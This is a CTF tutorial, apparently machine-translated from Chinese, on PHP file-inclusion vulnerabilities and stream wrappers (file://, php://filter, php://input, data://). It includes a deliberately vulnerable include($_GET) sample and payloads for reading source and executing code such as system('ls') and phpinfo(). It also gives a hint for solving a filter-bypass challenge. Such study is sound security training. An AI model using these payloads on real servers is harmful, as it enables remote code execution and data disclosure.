CTF_ Web: file contains pseudo protocol with PHP

Preface

stay CTF File inclusion and pseudo protocol use are also common topics , Common main uses include()、require() And other functions with which to generate exploitable vulnerabilities or command execution .

0x01 What is a file containing

In the process of development , In order to make better use of the reusability of code , Write some functions without repetition , Thus, the file containing function is introduced , Include files through the file include function , Use the code that contains the file , Reduce the code workload of development , You can include one or more other files in the same file and use their internally defined functions .

0x02 The file contains a vulnerability

In the process of File Inclusion , If there is no reference to the file types that can be included 、 The user's controllable range should be clearly limited , Will cause unexpected files to be included , Thus leading to the disclosure of sensitive information , Serious or even dangerous documents 、 Cause an order to be executed .

0x03 php Fake protocol

The pseudo agreement is php The total number of protocols supported and encapsulated in , Contains many types , Common are :

file:// —  Access local file system 
http:// —  visit  HTTP(s)  website 
ftp:// —  visit  FTP(s) URLs
php:// —  Access individual inputs / Output stream （I/O streams）
zlib:// —  Compressed flow 
data:// —  data （RFC 2397）
glob:// —  Find matching file path patterns 
phar:// — PHP  file 
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// —  Audio stream 
expect:// —  Handling interactive flows 

stay CTF in , Regular use file://、php://、data:// Three pseudo protocols are used in different environments to test the players' mastery of this knowledge , among , Each protocol consists of its own protocol header and converter , Tell the server user what protocol type of data is passed in through splicing , How to parse the data . for example ：

1.file:// agreement

file:// Used to access the local file system , Read local file , And do not suffer allow_url_fopen And allow_url_include The impact of setting , When you do not specify the absolute path to include the file , The default is the path where the script exists .

<?php
$file = $_GET['file'];
if ($file){
	echo $file,"<br/>";
	include($file);
}
?>

When the specified flag.php When you file , Pass in ?file=flag.php, The content is ook!, return ：

flag.php
oko!

here , The path starts from the current directory , When an absolute path is passed in , Look directly from the path , Such as ?file=D:\phpStudy\WWW\flag.php, return :

D:\\phpStudy\\WWW\\flag.php
oko!

2.php:// agreement

php:// There are many kinds of agreements , One of the most common is php://filter and php://input,filter Used to read file source code , Generally, the results are used as base64 encryption , Otherwise, you will not be able to see the contents of the file after it is executed , and input Is used to treat the user's input as php Code execution .

2.1php://filter agreement

 Its basic parameters are ：
resource=< Data stream to filter >	 must . It specifies the data stream you want to filter .
read=< Filter list of read chain >	 Optional . You can set one or more filter names , With a pipe (|) Separate 
write=< Filter list of write chain >	 Optional . You can set one or more filter names , With a pipe (|) Separate 
<; Filter list of two chains >	 Anything that doesn't  read=  or  write=  Prefixed filter lists are applied to read or write chains as appropriate .

Common filters are ：

string.rot13	 equivalent str_rot13(),rot13 Transformation 
string.toupper	  equivalent str_toupper(), Turn capitalization 
string.tolower	 equivalent str_tolower(), Turn lowercase 
string.strip_tags	 equivalent strip_tags(), Where to go html、php label 
convert.base64-encode&convert.base64-decode	   equivalent base64_encode() and base64_decode(),base64 Encoding and decoding 
convert.quoted-printable-encode & convert.quoted-printable-decode	 quoted-printable  String and  8-bit  String encoding decoding 

There are also some encryption and compression filters that are not mentioned here .
filter The general usage of the method is ：

• Read files directly
  php://filter/resource=flag.php
  Output ：

php://filter/resource=flag.php
oko!

• Encrypt the contents of the file
  php://filter/read=convert.base64-encode/resource=flag.php
  Output :

php://filter/read=convert.base64-encode/resource=flag.php
b2tv

Here you can see that the basic format is
Protocol header (php://filter)+/read(write)= filter （ Optional ）+/resource= file name （ must ）

2.2php://input agreement
php://input Read only stream that can access the requested raw data , take post The requested data is treated as php Code execution . When the passed in parameter is opened as a file name , You can set the parameter to php://input, meanwhile post The content of the file you want to set ,php The execution will post Content as file content .
Its use for ：

?file=php://input
POST: <?php system('ls');?>

3.data:// agreement

PHP>=5.2.0 rise , have access to data:// Data flow wrapper , To transfer data in the corresponding format . Can usually be used to perform PHP Code . Generally, we need to use base64 Code transmission , Avoid that some special characters cannot be parsed by the browser . Demand at this time

allow_url_fopen:on
allow_url_include :on
php>V5.2

Its use for ：

• Transmit plaintext
  ?file=data://text/plain,<?php phpinfo()?>
• transmission base64 Code content
  ?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
  thus it can be seen , The format for ： Protocol header （data://）+text/plain(;base64,)+ bright （ The secret ） writing , It should be noted that , The last symbol next to the transmitted data is a comma ,. If there is a coding method , Then use a semicolon ; separate .

4 Example

Refer to the world of attack and defense -Web_php_include Problem solving .

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

Use PHP://input flow post data , Or use data://text/plain;base64,xxxxxxxxxxxxx Can complete the topic .

0x04 Reference article

Shashengwan SESSYOUMARU
zesiar0
1ndex